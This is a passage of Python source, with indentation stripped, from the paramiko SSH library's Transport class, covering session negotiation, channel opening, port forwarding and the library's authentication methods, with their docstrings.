self.auth_handler = None
# response Message from an arbitrary global request
self.global_response = None
# user-defined event callbacks
self.completion_event = None
# how long (seconds) to wait for the SSH banner
self.banner_timeout = 15
# how long (seconds) to wait for the handshake to finish after SSH
# banner sent.
self.handshake_timeout = 15
# how long (seconds) to wait for the auth response.
self.auth_timeout = 30
# server mode:
self.server_mode = False
self.server_object = None
self.server_key_dict = {}
self.server_accepts = []
self.server_accept_cv = threading.Condition(self.lock)
self.subsystem_table = {}
def __repr__(self):
"""
Returns a string representation of this object, for debugging.
"""
id_ = hex(long(id(self)) & xffffffff)
out = "<paramiko.Transport at {}".format(id_)
if not self.active:
out += " (unconnected)"
else:
if self.local_cipher != "":
out += " (cipher {}, {:d} bits)".format(
self.local_cipher,
self._cipher_info[self.local_cipher]["key-size"] * 8,
)
if self.is_authenticated():
out += " (active; {} open channel(s))".format(
len(self._channels)
)
elif self.initial_kex_done:
out += " (connected; awaiting auth)"
else:
out += " (connecting)"
out += ">"
return out
def atfork(self):
"""
Terminate this Transport without closing the session. On posix
systems, if a Transport is open during process forking, both parent
and child will share the underlying socket, but only one process can
use the connection (without corrupting the session). Use this method
to clean up a Transport object without disrupting the other process.
.. versionadded:: 1.5.3
"""
self.sock.close()
self.close()
def get_security_options(self):
"""
Return a `.SecurityOptions` object which can be used to tweak the
encryption algorithms this transport will permit (for encryption,
digest/hash operations, public keys, and key exchanges) and the order
of preference for them.
"""
return SecurityOptions(self)
def set_gss_host(self, gss_host, trust_dns=True, gssapi_requested=True):
"""
Normalize/canonicalize ``self.gss_host`` depending on various factors.
:param str gss_host:
The explicitly requested GSS-oriented hostname to connect to (i.e.
what the host's name is in the Kerberos database.) Defaults to
``self.hostname`` (which will be the 'real' target hostname and/or
host portion of given socket object.)
:param bool trust_dns:
Indicates whether or not DNS is trusted; if true, DNS will be used
to canonicalize the GSS hostname (which again will either be
``gss_host`` or the transport's default hostname.)
(Defaults to True due to backwards compatibility.)
:param bool gssapi_requested:
Whether GSSAPI key exchange or authentication was even requested.
If not, this is a no-op and nothing happens
(and ``self.gss_host`` is not set.)
(Defaults to True due to backwards compatibility.)
:returns: ``None``.
"""
# No GSSAPI in play == nothing to do
if not gssapi_requested:
return
# Obtain the correct host first - did user request a GSS-specific name
# to use that is distinct from the actual SSH target hostname?
if gss_host is None:
gss_host = self.hostname
# Finally, canonicalize via DNS if DNS is trusted.
if trust_dns and gss_host is not None:
gss_host = socket.getfqdn(gss_host)
# And set attribute for reference later.
self.gss_host = gss_host
def start_client(self, event=None, timeout=None):
"""
Negotiate a new SSH2 session as a client. This is the first step after
creating a new `.Transport`. A separate thread is created for protocol
negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given ``Event`` will
be triggered. On failure, `is_active` will return ``False``.
(Since 1.4) If ``event`` is ``None``, this method will not return until
negotiation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, you will usually want to authenticate,
calling `auth_password <Transport.auth_password>` or
`auth_publickey <Transport.auth_publickey>`.
.. note:: `connect` is a simpler method for connecting as a client.
.. note::
After calling this method (or `start_server` or `connect`), you
should no longer directly read from or write to the original socket
object.
:param .threading.Event event:
an event to trigger when negotiation is complete (optional)
:param float timeout:
a timeout, in seconds, for SSH2 session negotiation (optional)
:raises:
`.SSHException` -- if negotiation fails (and no ``event`` was
passed in)
"""
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
max_time = time.time() + timeout if timeout is not None else None
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set() or (
timeout is not None and time.time() >= max_time
):
break
def start_server(self, event=None, server=None):
"""
Negotiate a new SSH2 session as a server. This is the first step after
creating a new `.Transport` and setting up your server host key(s). A
separate thread is created for protocol negotiation.
If an event is passed in, this method returns immediately. When
negotiation is done (successful or not), the given ``Event`` will
be triggered. On failure, `is_active` will return ``False``.
(Since 1.4) If ``event`` is ``None``, this method will not return until
negotiation is done. On success, the method returns normally.
Otherwise an SSHException is raised.
After a successful negotiation, the client will need to authenticate.
Override the methods `get_allowed_auths
<.ServerInterface.get_allowed_auths>`, `check_auth_none
<.ServerInterface.check_auth_none>`, `check_auth_password
<.ServerInterface.check_auth_password>`, and `check_auth_publickey
<.ServerInterface.check_auth_publickey>` in the given ``server`` object
to control the authentication process.
After a successful authentication, the client should request to open a
channel. Override `check_channel_request
<.ServerInterface.check_channel_request>` in the given ``server``
object to allow channels to be opened.
.. note::
After calling this method (or `start_client` or `connect`), you
should no longer directly read from or write to the original socket
object.
:param .threading.Event event:
an event to trigger when negotiation is complete.
:param .ServerInterface server:
an object used to perform authentication and create `channels
<.Channel>`
:raises:
`.SSHException` -- if negotiation fails (and no ``event`` was
passed in)
"""
if server is None:
server = ServerInterface()
self.server_mode = True
self.server_object = server
self.active = True
if event is not None:
# async, return immediately and let the app poll for completion
self.completion_event = event
self.start()
return
# synchronous, wait for a result
self.completion_event = event = threading.Event()
self.start()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if event.is_set():
break
def add_server_key(self, key):
"""
Add a host key to the list of keys used for server mode. When behaving
as a server, the host key is used to sign certain packets during the
SSH2 negotiation, so that the client can trust that we are who we say
we are. Because this is used for signing, the key must contain private
key info, not just the public half. Only one key of each type (RSA or
DSS) is kept.
:param .PKey key:
the host key to add, usually an `.RSAKey` or `.DSSKey`.
"""
self.server_key_dict[key.get_name()] = key
def get_server_key(self):
"""
Return the active host key, in server mode. After negotiating with the
client, this method will return the negotiated host key. If only one
type of host key was set with `add_server_key`, that's the only key
that will ever be returned. But in cases where you have set more than
one type of host key (for example, an RSA key and a DSS key), the key
type will be negotiated by the client, and this method will return the
key of the type agreed on. If the host key has not been negotiated
yet, ``None`` is returned. In client mode, the behavior is undefined.
:return:
host key (`.PKey`) of the type negotiated by the client, or
``None``.
"""
try:
return self.server_key_dict[self.host_key_type]
except KeyError:
pass
return None
@staticmethod
def load_server_moduli(filename=None):
"""
(optional)
Load a file of prime moduli for use in doing group-exchange key
negotiation in server mode. It's a rather obscure option and can be
safely ignored.
In server mode, the remote client may request "group-exchange" key
negotiation, which asks the server to send a random prime number that
fits certain criteria. These primes are pretty difficult to compute,
so they can't be generated on demand. But many systems contain a file
of suitable primes (usually named something like ``/etc/ssh/moduli``).
If you call `load_server_moduli` and it returns ``True``, then this
file of primes has been loaded and we will support "group-exchange" in
server mode. Otherwise server mode will just claim that it doesn't
support that method of key negotiation.
:param str filename:
optional path to the moduli file, if you happen to know that it's
not in a standard location.
:return:
True if a moduli file was successfully loaded; False otherwise.
.. note:: This has no effect when used in client mode.
"""
Transport._modulus_pack = ModulusPack()
# places to look for the openssh "moduli" file
file_list = ["/etc/ssh/moduli", "/usr/local/etc/moduli"]
if filename is not None:
file_list.insert(0, filename)
for fn in file_list:
try:
Transport._modulus_pack.read_file(fn)
return True
except IOError:
pass
# none succeeded
Transport._modulus_pack = None
return False
def close(self):
"""
Close this session, and any open channels that are tied to it.
"""
if not self.active:
return
self.stop_thread()
for chan in list(self._channels.values()):
chan._unlink()
self.sock.close()
def get_remote_server_key(self):
"""
Return the host key of the server (in client mode).
.. note::
Previously this call returned a tuple of ``(key type, key
string)``. You can get the same effect by calling `.PKey.get_name`
for the key type, and ``str(key)`` for the key string.
:raises: `.SSHException` -- if no session is currently active.
:return: public key (`.PKey`) of the remote server
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
return self.host_key
def is_active(self):
"""
Return true if this session is active (open).
:return:
True if the session is still active (open); False if the session is
closed
"""
return self.active
def open_session(
self, window_size=None, max_packet_size=None, timeout=None
):
"""
Request a new channel to the server, of type ``"session"``. This is
just an alias for calling `open_channel` with an argument of
``"session"``.
.. note:: Modifying the the window and packet sizes might have adverse
effects on the session created. The default values are the same
as in the OpenSSH code base and have been battle tested.
:param int window_size:
optional window size for this session.
:param int max_packet_size:
optional max packet size for this session.
:return: a new `.Channel`
:raises:
`.SSHException` -- if the request is rejected or the session ends
prematurely
.. versionchanged:: 1.13.4/1.14.3/1.15.3
Added the ``timeout`` argument.
.. versionchanged:: 1.15
Added the ``window_size`` and ``max_packet_size`` arguments.
"""
return self.open_channel(
"session",
window_size=window_size,
max_packet_size=max_packet_size,
timeout=timeout,
)
def open_x11_channel(self, src_addr=None):
"""
Request a new channel to the client, of type ``"x11"``. This
is just an alias for ``open_channel('x11', src_addr=src_addr)``.
:param tuple src_addr:
the source address (``(str, int)``) of the x11 server (port is the
x11 port, ie. 6010)
:return: a new `.Channel`
:raises:
`.SSHException` -- if the request is rejected or the session ends
prematurely
"""
return self.open_channel("x11", src_addr=src_addr)
def open_forward_agent_channel(self):
"""
Request a new channel to the client, of type
``"auth-agent@openssh.com"``.
This is just an alias for ``open_channel('auth-agent@openssh.com')``.
:return: a new `.Channel`
:raises: `.SSHException` --
if the request is rejected or the session ends prematurely
"""
return self.open_channel("auth-agent@openssh.com")
def open_forwarded_tcpip_channel(self, src_addr, dest_addr):
"""
Request a new channel back to the client, of type ``forwarded-tcpip``.
This is used after a client has requested port forwarding, for sending
incoming connections back to the client.
:param src_addr: originator's address
:param dest_addr: local (server) connected address
"""
return self.open_channel("forwarded-tcpip", dest_addr, src_addr)
def open_channel(
self,
kind,
dest_addr=None,
src_addr=None,
window_size=None,
max_packet_size=None,
timeout=None,
):
"""
Request a new channel to the server. `Channels <.Channel>` are
socket-like objects used for the actual transfer of data across the
session. You may only request a channel after negotiating encryption
(using `connect` or `start_client`) and authenticating.
.. note:: Modifying the the window and packet sizes might have adverse
effects on the channel created. The default values are the same
as in the OpenSSH code base and have been battle tested.
:param str kind:
the kind of channel requested (usually ``"session"``,
``"forwarded-tcpip"``, ``"direct-tcpip"``, or ``"x11"``)
:param tuple dest_addr:
the destination address (address + port tuple) of this port
forwarding, if ``kind`` is ``"forwarded-tcpip"`` or
``"direct-tcpip"`` (ignored for other channel types)
:param src_addr: the source address of this port forwarding, if
``kind`` is ``"forwarded-tcpip"``, ``"direct-tcpip"``, or ``"x11"``
:param int window_size:
optional window size for this session.
:param int max_packet_size:
optional max packet size for this session.
:param float timeout:
optional timeout opening a channel, default 3600s (1h)
:return: a new `.Channel` on success
:raises:
`.SSHException` -- if the request is rejected, the session ends
prematurely or there is a timeout openning a channel
.. versionchanged:: 1.15
Added the ``window_size`` and ``max_packet_size`` arguments.
"""
if not self.active:
raise SSHException("SSH session not active")
timeout = 3600 if timeout is None else timeout
self.lock.acquire()
try:
window_size = self._sanitize_window_size(window_size)
max_packet_size = self._sanitize_packet_size(max_packet_size)
chanid = self._next_channel()
m = Message()
m.add_byte(cMSG_CHANNEL_OPEN)
m.add_string(kind)
m.add_int(chanid)
m.add_int(window_size)
m.add_int(max_packet_size)
if (kind == "forwarded-tcpip") or (kind == "direct-tcpip"):
m.add_string(dest_addr[0])
m.add_int(dest_addr[1])
m.add_string(src_addr[0])
m.add_int(src_addr[1])
elif kind == "x11":
m.add_string(src_addr[0])
m.add_int(src_addr[1])
chan = Channel(chanid)
self._channels.put(chanid, chan)
self.channel_events[chanid] = event = threading.Event()
self.channels_seen[chanid] = True
chan._set_transport(self)
chan._set_window(window_size, max_packet_size)
finally:
self.lock.release()
self._send_user_message(m)
start_ts = time.time()
while True:
event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is None:
e = SSHException("Unable to open channel.")
raise e
if event.is_set():
break
elif start_ts + timeout < time.time():
raise SSHException("Timeout opening channel.")
chan = self._channels.get(chanid)
if chan is not None:
return chan
e = self.get_exception()
if e is None:
e = SSHException("Unable to open channel.")
raise e
def request_port_forward(self, address, port, handler=None):
"""
Ask the server to forward TCP connections from a listening port on
the server, across this SSH session.
If a handler is given, that handler is called from a different thread
whenever a forwarded connection arrives. The handler parameters are::
handler(
channel,
(origin_addr, origin_port),
(server_addr, server_port),
)
where ``server_addr`` and ``server_port`` are the address and port that
the server was listening on.
If no handler is set, the default behavior is to send new incoming
forwarded connections into the accept queue, to be picked up via
`accept`.
:param str address: the address to bind when forwarding
:param int port:
the port to forward, or 0 to ask the server to allocate any port
:param callable handler:
optional handler for incoming forwarded connections, of the form
``func(Channel, (str, int), (str, int))``.
:return: the port number (`int`) allocated by the server
:raises:
`.SSHException` -- if the server refused the TCP forward request
"""
if not self.active:
raise SSHException("SSH session not active")
port = int(port)
response = self.global_request(
"tcpip-forward", (address, port), wait=True
)
if response is None:
raise SSHException("TCP forwarding request denied")
if port == 0:
port = response.get_int()
if handler is None:
def default_handler(channel, src_addr, dest_addr_port):
# src_addr, src_port = src_addr_port
# dest_addr, dest_port = dest_addr_port
self._queue_incoming_channel(channel)
handler = default_handler
self._tcp_handler = handler
return port
def cancel_port_forward(self, address, port):
"""
Ask the server to cancel a previous port-forwarding request. No more
connections to the given address & port will be forwarded across this
ssh connection.
:param str address: the address to stop forwarding
:param int port: the port to stop forwarding
"""
if not self.active:
return
self._tcp_handler = None
self.global_request("cancel-tcpip-forward", (address, port), wait=True)
def open_sftp_client(self):
"""
Create an SFTP client channel from an open transport. On success, an
SFTP session will be opened with the remote host, and a new
`.SFTPClient` object will be returned.
:return:
a new `.SFTPClient` referring to an sftp session (channel) across
this transport
"""
return SFTPClient.from_transport(self)
def send_ignore(self, byte_count=None):
"""
Send a junk packet across the encrypted link. This is sometimes used
to add "noise" to a connection to confuse would-be attackers. It can
also be used as a keep-alive for long lived connections traversing
firewalls.
:param int byte_count:
the number of random bytes to send in the payload of the ignored
packet -- defaults to a random number from 10 to 41.
"""
m = Message()
m.add_byte(cMSG_IGNORE)
if byte_count is None:
byte_count = (byte_ord(os.urandom(1)) % 32) + 10
m.add_bytes(os.urandom(byte_count))
self._send_user_message(m)
def renegotiate_keys(self):
"""
Force this session to switch to new keys. Normally this is done
automatically after the session hits a certain number of packets or
bytes sent or received, but this method gives you the option of forcing
new keys whenever you want. Negotiating new keys causes a pause in
traffic both ways as the two sides swap keys and do computations. This
method returns when the session has switched to new keys.
:raises:
`.SSHException` -- if the key renegotiation failed (which causes
the session to end)
"""
self.completion_event = threading.Event()
self._send_kex_init()
while True:
self.completion_event.wait(0.1)
if not self.active:
e = self.get_exception()
if e is not None:
raise e
raise SSHException("Negotiation failed.")
if self.completion_event.is_set():
break
return
def set_keepalive(self, interval):
"""
Turn on/off keepalive packets (default is off). If this is set, after
``interval`` seconds without sending any data over the connection, a
"keepalive" packet will be sent (and ignored by the remote host). This
can be useful to keep connections alive over a NAT, for example.
:param int interval:
seconds to wait before sending a keepalive packet (or
0 to disable keepalives).
"""
def _request(x=weakref.proxy(self)):
return x.global_request("keepalive@lag.net", wait=False)
self.packetizer.set_keepalive(interval, _request)
def global_request(self, kind, data=None, wait=True):
"""
Make a global request to the remote host. These are normally
extensions to the SSH2 protocol.
:param str kind: name of the request.
:param tuple data:
an optional tuple containing additional data to attach to the
request.
:param bool wait:
``True`` if this method should not return until a response is
received; ``False`` otherwise.
:return:
a `.Message` containing possible additional data if the request was
successful (or an empty `.Message` if ``wait`` was ``False``);
``None`` if the request was denied.
"""
if wait:
self.completion_event = threading.Event()
m = Message()
m.add_byte(cMSG_GLOBAL_REQUEST)
m.add_string(kind)
m.add_boolean(wait)
if data is not None:
m.add(*data)
self._log(DEBUG, 'Sending global request "{}"'.format(kind))
self._send_user_message(m)
if not wait:
return None
while True:
self.completion_event.wait(0.1)
if not self.active:
return None
if self.completion_event.is_set():
break
return self.global_response
def accept(self, timeout=None):
"""
Return the next channel opened by the client over this transport, in
server mode. If no channel is opened before the given timeout,
``None`` is returned.
:param int timeout:
seconds to wait for a channel, or ``None`` to wait forever
:return: a new `.Channel` opened by the client
"""
self.lock.acquire()
try:
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
self.server_accept_cv.wait(timeout)
if len(self.server_accepts) > 0:
chan = self.server_accepts.pop(0)
else:
# timeout
chan = None
finally:
self.lock.release()
return chan
def connect(
self,
hostkey=None,
username="",
password=None,
pkey=None,
gss_host=None,
gss_auth=False,
gss_kex=False,
gss_deleg_creds=True,
gss_trust_dns=True,
):
"""
Negotiate an SSH2 session, and optionally verify the server's host key
and authenticate using a password or private key. This is a shortcut
for `start_client`, `get_remote_server_key`, and
`Transport.auth_password` or `Transport.auth_publickey`. Use those
methods if you want more control.
You can use this method immediately after creating a Transport to
negotiate encryption with a server. If it fails, an exception will be
thrown. On success, the method will return cleanly, and an encrypted
session exists. You may immediately call `open_channel` or
`open_session` to get a `.Channel` object, which is used for data
transfer.
.. note::
If you fail to supply a password or private key, this method may
succeed, but a subsequent `open_channel` or `open_session` call may
fail because you haven't authenticated yet.
:param .PKey hostkey:
the host key expected from the server, or ``None`` if you don't
want to do host key verification.
:param str username: the username to authenticate as.
:param str password:
a password to use for authentication, if you want to use password
authentication; otherwise ``None``.
:param .PKey pkey:
a private key to use for authentication, if you want to use private
key authentication; otherwise ``None``.
:param str gss_host:
The target's name in the kerberos database. Default: hostname
:param bool gss_auth:
``True`` if you want to use GSS-API authentication.
:param bool gss_kex:
Perform GSS-API Key Exchange and user authentication.
:param bool gss_deleg_creds:
Whether to delegate GSS-API client credentials.
:param gss_trust_dns:
Indicates whether or not the DNS is trusted to securely
canonicalize the name of the host being connected to (default
``True``).
:raises: `.SSHException` -- if the SSH2 negotiation fails, the host key
supplied by the server is incorrect, or authentication fails.
.. versionchanged:: 2.3
Added the ``gss_trust_dns`` argument.
"""
if hostkey is not None:
self._preferred_keys = [hostkey.get_name()]
self.set_gss_host(
gss_host=gss_host,
trust_dns=gss_trust_dns,
gssapi_requested=gss_kex or gss_auth,
)
self.start_client()
# check host key if we were given one
# If GSS-API Key Exchange was performed, we are not required to check
# the host key.
if (hostkey is not None) and not gss_kex:
key = self.get_remote_server_key()
if (
key.get_name() != hostkey.get_name()
or key.asbytes() != hostkey.asbytes()
):
self._log(DEBUG, "Bad host key from server")
self._log(
DEBUG,
"Expected: {}: {}".format(
hostkey.get_name(), repr(hostkey.asbytes())
),
)
self._log(
DEBUG,
"Got : {}: {}".format(
key.get_name(), repr(key.asbytes())
),
)
raise SSHException("Bad host key from server")
self._log(
DEBUG, "Host key verified ({})".format(hostkey.get_name())
)
if (pkey is not None) or (password is not None) or gss_auth or gss_kex:
if gss_auth:
self._log(
DEBUG, "Attempting GSS-API auth... (gssapi-with-mic)"
) # noqa
self.auth_gssapi_with_mic(
username, self.gss_host, gss_deleg_creds
)
elif gss_kex:
self._log(DEBUG, "Attempting GSS-API auth... (gssapi-keyex)")
self.auth_gssapi_keyex(username)
elif pkey is not None:
self._log(DEBUG, "Attempting public-key auth...")
self.auth_publickey(username, pkey)
else:
self._log(DEBUG, "Attempting password auth...")
self.auth_password(username, password)
return
def get_exception(self):
"""
Return any exception that happened during the last server request.
This can be used to fetch more specific error information after using
calls like `start_client`. The exception (if any) is cleared after
this call.
:return:
an exception, or ``None`` if there is no stored exception.
.. versionadded:: 1.1
"""
self.lock.acquire()
try:
e = self.saved_exception
self.saved_exception = None
return e
finally:
self.lock.release()
def set_subsystem_handler(self, name, handler, *larg, **kwarg):
"""
Set the handler class for a subsystem in server mode. If a request
for this subsystem is made on an open ssh channel later, this handler
will be constructed and called -- see `.SubsystemHandler` for more
detailed documentation.
Any extra parameters (including keyword arguments) are saved and
passed to the `.SubsystemHandler` constructor later.
:param str name: name of the subsystem.
:param handler:
subclass of `.SubsystemHandler` that handles this subsystem.
"""
try:
self.lock.acquire()
self.subsystem_table[name] = (handler, larg, kwarg)
finally:
self.lock.release()
def is_authenticated(self):
"""
Return true if this session is active and authenticated.
:return:
True if the session is still open and has been authenticated
successfully; False if authentication failed and/or the session is
closed.
"""
return (
self.active
and self.auth_handler is not None
and self.auth_handler.is_authenticated()
)
def get_username(self):
"""
Return the username this connection is authenticated for. If the
session is not authenticated (or authentication failed), this method
returns ``None``.
:return: username that was authenticated (a `str`), or ``None``.
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.get_username()
def get_banner(self):
"""
Return the banner supplied by the server upon connect. If no banner is
supplied, this method returns ``None``.
:returns: server supplied banner (`str`), or ``None``.
.. versionadded:: 1.13
"""
if not self.active or (self.auth_handler is None):
return None
return self.auth_handler.banner
def auth_none(self, username):
"""
Try to authenticate to the server using no authentication at all.
This will almost always fail. It may be useful for determining the
list of authentication types supported by the server, by catching the
`.BadAuthenticationType` exception raised.
:param str username: the username to authenticate as
:return:
list of auth types permissible for the next stage of
authentication (normally empty)
:raises:
`.BadAuthenticationType` -- if "none" authentication isn't allowed
by the server for this user
:raises:
`.SSHException` -- if the authentication failed due to a network
error
.. versionadded:: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_none(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def auth_password(self, username, password, event=None, fallback=True):
"""
Authenticate to the server using a password. The username and password
are sent over an encrypted link.
If an ``event`` is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, `is_authenticated` will return ``True``. On failure, you may
use `get_exception` to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
Since 1.5, if no event is passed and ``fallback`` is ``True`` (the
default), if the server doesn't support plain password authentication
but does support so-called "keyboard-interactive" mode, an attempt
will be made to authenticate using this interactive mode. If it fails,
the normal exception will be thrown as if the attempt had never been
made. This is useful for some recent Gentoo and Debian distributions,
which turn off plain password authentication in a misguided belief
that interactive authentication is "more secure". (It's not.)
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
:param str username: the username to authenticate as
:param basestring password: the password to authenticate with
:param .threading.Event event:
an event to trigger when the authentication attempt is complete
(whether it was successful or not)
:param bool fallback:
``True`` if an attempt at an automated "interactive" password auth
should be made if the server doesn't support normal password auth
:return:
list of auth types permissible for the next stage of
authentication (normally empty)
:raises:
`.BadAuthenticationType` -- if password authentication isn't
allowed by the server for this user (and no event was passed in)
:raises:
`.AuthenticationException` -- if the authentication failed (and no
event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to send the password unless we're on a secure
# link
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_password(username, password, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
try:
return self.auth_handler.wait_for_response(my_event)
except BadAuthenticationType as e:
# if password auth isn't allowed, but keyboard-interactive *is*,
# try to fudge it
if not fallback or ("keyboard-interactive" not in e.allowed_types):
raise
try:
def handler(title, instructions, fields):
if len(fields) > 1:
raise SSHException("Fallback authentication failed.")
if len(fields) == 0:
# for some reason, at least on os x, a 2nd request will
# be made with zero fields requested. maybe it's just
# to try to fake out automated scripting of the exact
# type we're doing here. *shrug* :)
return []
return [password]
return self.auth_interactive(username, handler)
except SSHException:
# attempt failed; just raise the original exception
raise e
def auth_publickey(self, username, key, event=None):
"""
Authenticate to the server using a private key. The key is used to
sign data from the server, so it must include the private part.
If an ``event`` is passed in, this method will return immediately, and
the event will be triggered once authentication succeeds or fails. On
success, `is_authenticated` will return ``True``. On failure, you may
use `get_exception` to get more detailed error information.
Since 1.1, if no event is passed, this method will block until the
authentication succeeds or fails. On failure, an exception is raised.
Otherwise, the method simply returns.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
:param str username: the username to authenticate as
:param .PKey key: the private key to authenticate with
:param .threading.Event event:
an event to trigger when the authentication attempt is complete
(whether it was successful or not)
:return:
list of auth types permissible for the next stage of
authentication (normally empty)
:raises:
`.BadAuthenticationType` -- if public-key authentication isn't
allowed by the server for this user (and no event was passed in)
:raises:
`.AuthenticationException` -- if the authentication failed (and no
event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
if event is None:
my_event = threading.Event()
else:
my_event = event
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_publickey(username, key, my_event)
if event is not None:
# caller wants to wait for event themselves
return []
return self.auth_handler.wait_for_response(my_event)
def auth_interactive(self, username, handler, submethods=""):
"""
Authenticate to the server interactively. A handler is used to answer
arbitrary questions from the server. On many servers, this is just a
dumb wrapper around PAM.
This method will block until the authentication succeeds or fails,
peroidically calling the handler asynchronously to get answers to
authentication questions. The handler may be called more than once
if the server continues to ask questions.
The handler is expected to be a callable that will handle calls of the
form: ``handler(title, instructions, prompt_list)``. The ``title`` is
meant to be a dialog-window title, and the ``instructions`` are user
instructions (both are strings). ``prompt_list`` will be a list of
prompts, each prompt being a tuple of ``(str, bool)``. The string is
the prompt and the boolean indicates whether the user text should be
echoed.
A sample call would thus be:
``handler('title', 'instructions', [('Password:', False)])``.
The handler should return a list or tuple of answers to the server's
questions.
If the server requires multi-step authentication (which is very rare),
this method will return a list of auth types permissible for the next
step. Otherwise, in the normal case, an empty list is returned.
:param str username: the username to authenticate as
:param callable handler: a handler for responding to server questions
:param str submethods: a string list of desired submethods (optional)
:return:
list of auth types permissible for the next stage of
authentication (normally empty).
:raises: `.BadAuthenticationType` -- if public-key authentication isn't
allowed by the server for this user
:raises: `.AuthenticationException` -- if the authentication failed
:raises: `.SSHException` -- if there was a network error
.. versionadded:: 1.5
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_interactive(
username, handler, my_event, submethods
)
return self.auth_handler.wait_for_response(my_event)
def auth_interactive_dumb(self, username, handler=None, submethods=""):
"""
Autenticate to the server interactively but dumber.
Just print the prompt and / or instructions to stdout and send back
the response. This is good for situations where partial auth is
achieved by key and then the user has to enter a 2fac token.
"""
if not handler:
def handler(title, instructions, prompt_list):
answers = []
if title:
print(title.strip())
if instructions:
print(instructions.strip())
for prompt, show_input in prompt_list:
print(prompt.strip(), end=" ")
answers.append(input())
return answers
return self.auth_interactive(username, handler, submethods)
def auth_gssapi_with_mic(self, username, gss_host, gss_deleg_creds):
"""
Authenticate to the Server using GSS-API / SSPI.
:param str username: The username to authenticate as
:param str gss_host: The target host
:param bool gss_deleg_creds: Delegate credentials or not
:return: list of auth types permissible for the next stage of
authentication (normally empty)
:raises: `.BadAuthenticationType` -- if gssapi-with-mic isn't
allowed by the server (and no event was passed in)
:raises:
`.AuthenticationException` -- if the authentication failed (and no
event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_with_mic(
username, gss_host, gss_deleg_creds, my_event
)
return self.auth_handler.wait_for_response(my_event)
def auth_gssapi_keyex(self, username):
"""
Authenticate to the server with GSS-API/SSPI if GSS-API kex is in use.
:param str username: The username to authenticate as.
:returns:
a list of auth types permissible for the next stage of
authentication (normally empty)
:raises: `.BadAuthenticationType` --
if GSS-API Key Exchange was not performed (and no event was passed
in)
:raises: `.AuthenticationException` --
if the authentication failed (and no event was passed in)
:raises: `.SSHException` -- if there was a network error
"""
if (not self.active) or (not self.initial_kex_done):
# we should never try to authenticate unless we're on a secure link
raise SSHException("No existing session")
my_event = threading.Event()
self.auth_handler = AuthHandler(self)
self.auth_handler.auth_gssapi_keyex(username, my_event)
return self.auth_handler.wait_for_response(my_event)
def set_log_channel(self, name):
"""
Set the channel for this transport's logging. The default is
``"paramiko.transport"`` but it can be set to anything you want. (See
the `.logging` module for more info.) SSH Channels will log to a
sub-channel of the one specified.
:param str name: new channel name for logging
.. versionadded:: 1.1
"""
self.log_name = name
self.logger = util.get_logger(name)
self.packetizer.set_log(self.logger)
def get_log_channel(self):
"""
Return the channel name used for this transport's logging.
:return: channel name as a `str`
.. versionadded:: 1.2
"""
return self.log_name
def set_hexdump(self, hexdump):
"""
Turn on/off logging a hex dump of protocol traffic at DEBUG level in
the logs. Normally you would want this off (which is the default),
but if you are debugging something, it may be useful.
:param bool hexdump:
``True`` to log protocol traffix (in hex) to the log; ``False``
otherwise.
"""
self.packetizer.set_hexdump(hexdump)
def get_hexdump(self):
"""
Return ``True`` if the transport is currently logging hex dumps of
protocol traffic.
:return: ``True`` if hex dumps are being logged, else ``False``.
.. versionadded:: 1.4
"""
return self.packetizer.get_hexdump()
def use_compression(self, compress=True):
"""
Turn on/off compression. This will only have an affect before starting
the transport (ie before calling `connect`, etc). By default,
compression is off since it negatively affects interactive sessions.
:param bool compress:
``True`` to ask the remote client/server to compress traffic;
``False`` to refuse compression
.. versionadded:: 1.5.2
"""
if compress:
self._preferred_compression = ("zlib@openssh.com", "zlib", "none")
else:
self._preferred_compression = ("none",)
def getpeername(self):
"""
Return the address of the remote side of this Transport, if possible.
This is effectively a wrapper around ``getpeername`` on the underlying
socket. If the socket-like object has no ``getpeername`` method, then
``("unknown", 0)`` is returned.
:return:
the address of the remote host, if known, as a ``(str, int)``
tuple.
"""
gp = getattr(self.sock, "getpeername", None)
if gp is None:
return "unknown", 0
return gp()
def stop_thread(self):
self.active = False
self.packetizer.close()
if PY2:
# Original join logic; #520 doesn't appear commonly present under
# Python 2.
while self.is_alive() and self is not threading.current_thread():
self.join(10)
else:
# Keep trying to join() our main thread, quickly, until:
# * We join()ed successfully (self.is_alive() == False)
